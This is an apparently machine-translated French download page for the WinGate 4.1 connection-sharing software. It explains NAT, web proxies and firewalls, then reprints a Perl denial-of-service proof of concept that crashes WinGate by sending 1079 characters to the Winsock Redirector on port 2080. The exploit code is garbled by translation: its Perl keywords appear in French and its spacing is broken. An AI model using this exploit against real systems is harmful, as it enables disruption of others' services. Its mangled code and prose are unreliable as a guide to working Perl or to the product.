Logiciels réseau

Télécharger Deerfield Wingate 4.1 (Partage de connections)


Télécharger Télécharger Deerfield Wingate 4.1 (Partage de connections)

★★★★★★★★★★3.5 étoiles sur 5 basé sur 1 votes.
Votez ce document:

Télécharger aussi :


Deerfield Wingate 4.1 (Partage de connections)

Deerfield Wingate 4.1 qui permet le partage d'Internet simultanée pour les ordinateurs en réseau, en utilisant une seule connexion Internet de presque n'importe quel type. Agissant comme un puissant pare-feu, WinGate aide également à protéger votre précieux réseau des intrus. WinGate 4.1 est disponible dans Home, Standard et Pro et débutsde plug-in gratuit options (y compris le soutien de tiers) disponibles sur le site.WinGate a été testé et est compatible avec Windows 95, Windows 98, Windows 98SE, Windows ME, Windows NT Server 4.0, Windows NT Workstation 4.0,Windows 2000 Server, Windows 2000 Advanced Server et Windows 2000 Professionnel.

Avant de nous plonger dans ce logiciel en profondeur, permet de définir certaines technologies de terminologie et de sorte que vous pouvez comprendre exactement ce Wingate est et ce qu'il fait. J'ai utilisé le terme NAT et proxy dans le paragraphe ci-dessus. Permet de définir exactement ce que ces termes signifient.

NAT est synonyme de traduction d'adresses réseau, cela signifie être capable de traduire d'une IP externe (tel que votre Internet IP) à un réseau interne de nombreux clients chacun avec leurs propres adresses IP LAN interne unique. Et il permet que l'inverse se produise, le nombre client PC avec IP LAN interne unique d'être traduit en un Internet / externe IP unique. L'une des principales raisons pour lesquelles nous voulons faire ce partage de connexion Internet d'un IP est de nos jours en raison du nombre limité de qui est disponible dans le monde IP avec le standard IPv4 actuel. Disons que vous avez 10 ordinateurs dans votre maison et ils sont tous en réseau sur un réseau TCP / IP LAN interne avec les IP unique sur un sous-réseau unique, permet maintenant dites que vous venez d'acheter ce nouveau modem câble mais vous n'avez qu'une seule IP avec elle et vous voulez avoir tous vos ordinateurs partagent la connexion Internet, mais vous ne pouvez pas se permettre d'acheter une adresse IP unique pour chaque ordinateur de votre compagnie de câble. Eh bien c'est maintenant la possibilité de configurer ce serveur NAT! Avec NAT fonctionnant sur une machine, vous serez en mesure d'avoir tous vos clients connectés via un Hub au serveur NAT et ils peuvent tous accéder à l'Internet, même si elles n'ont pas les IP externes uniques de la compagnie de câble, parce que le NAT traduit l' IP interne est à la une IP de câble rend totalement transparente pour l'utilisateur et tout le monde sera heureux de surfer sur le web en même temps.



Un proxy est un dispositif qui agit pour le compte d'un autre. Le terme est le plus souvent utilisé pour désigner Web proxy. Un proxy Web agit comme un serveur Web "à mi-chemin": les clients du réseau font des demandes à la procuration, ce qui rend alors les demandes en leur nom au serveur Web approprié. technologie de proxy est souvent considérée comme une voie alternative pour fournir un accès partagé à une seule connexion Internet. Les principaux avantages du Web proxy sont:

· La mise en cache locale: un proxy peut stocker les pages les plus consultées sur son disque dur local, lorsque ces pages sont demandées, il peut leur servir de ses fichiers locaux au lieu d'avoir à télécharger les données à partir d'un serveur Web distant. Les procurations qui effectuent la mise en cache sont souvent appelés en cache des serveurs proxy.

· La conservation de la bande passante du réseau: si les demandes de plus d'un client de la même page, le mandataire peut faire une demande uniquement à un serveur distant et distribuer les données reçues à tous les clients en attente.

Ces deux avantages ne deviennent apparents que dans les situations où plusieurs clients sont très susceptibles d'avoir accès aux mêmes sites et ainsi de partager les mêmes données. Contrairement NAT, proxy Web n'est pas un fonctionnement transparent: ses clients doivent explicitement soutenir. En raison de l'adoption anticipée de proxy Web, la plupart des navigateurs, y compris Internet Explorer et Netscape Communicator, ont un support intégré pour les proxies, mais cela doit normalement être configuré sur chaque poste client, et peut être modifié par l'utilisateur naïf ou malicieux. Les procurations sont utilisées sur de très très grands réseaux, comme 1000 ordinateurs ou plus qui ont besoin de partager une connexion Internet.

Une autre technologie qui est très important dans Wingate est sa capacité de pare-feu. Il suffit de mettre un pare-feu vous protège en fermant / cacher des ports et d'autres méthodes semblables pour éviter les failles de sécurité. Il ya des matériels et logiciels pare-feu là-bas, un pare-feu matériel est le genre qui est intégré dans des dispositifs matériels tels que des routeurs, d'autre part un logiciel pare-feu est celui qui est un logiciel basé, comme ce qui utilise Wingate. Il est beaucoup plus puissant que les uns comme BlackICE ou ZoneAlarm.



...

Systèmes immunitaires:
Wingate 4.1 Beta A
Si le service de redirection Winsock est activé, il est possible de planter le service Wingate à distance en envoyant une chaîne spéciale au redirecteur Winsock. Le moteur Wingate doit être redémarré pour reprendre son fonctionnement normal.
Exploit Code:
#! / usr / bin / perl
#
# wgate401.pl - Wingate 4.0.1 déni de service

#
# ------------------------------------------------- ---------
# Avertissement: ce fichier est conçu comme preuve de concept, et
# n'est pas destiné à être utilisé à des fins illégales. J'accepte
# pas de responsabilité pour les dommages encourus par l'utilisation de celui-ci.
# ------------------------------------------------- ---------
#
# Provoque l'indisponibilité de tous les services Wingate jusqu'à ce que le moteur Wingate
# est redémarré. Le service Winsock Redirector doit être activé pour que
# ceci pour travailler. Testé sur la version d'évaluation de Wingate Pro 4.0.1.
#
utilisez IO :: Socket;
$ host = "host.com";
$ port = "2080";
$ sleepfor = 1;
imprimer "Wingate 4.0.1 dénie de service

-------------------------------------------------- --------
Avertissement: ce fichier est conçu comme preuve de concept, et
n'est pas destiné à être utilisé à des fins illégales. J'accepte
aucune responsabilité pour les dommages causés par l'utilisation de celui-ci.
-------------------------------------------------- --------
Provoque l'indisponibilité de tous les services Wingate jusqu'à ce que le moteur Wingate
est redémarré. Le service Winsock Redirector doit être activé pour que
ceci pour fonctionner. \ n \ n ";
# Connectez-vous au service Winsock Redirector.
print "Connexion à $ host: $ port ...";
$ socket = IO :: Socket :: INET-> nouveau (Proto => "tcp", PeerAddr => $ host, PeerPort => $ port) || mourir "échoué. \ n";
imprimer "fait. \ n";
# Envoyer des caractères au service Winsock Redirector.
$ buffer = "a" x 1079;
print $ socket "$ buffer";
# Attendez quelques secondes.
$ counter = 0;
print "Dormir pour $ sleepfor secondes.";
while ($ counter <$ sleepfor) {
        dormir (1);
        impression ".";
        $ compteur + = 1;
}
imprimez "\ n";



# Ferme la connexion. Le service de redirecteur Winsock devrait maintenant être
# désactivée.
fermer ($ socket);
# Connectez-vous une fois de plus au service Winsock Redirector. Cela désactivera tout
# autres services.
print "Connexion à $ host: $ port ...";
$ socket = IO :: Socket :: INET-> nouveau (Proto => "tcp", PeerAddr => $ host, PeerPort => $ port) || mourir "échoué. \ n";
imprimer "fait. \ n";
# Fini.
fermer ($ socket);

Deerfield Wingate 4.1 (Partage de connections)


389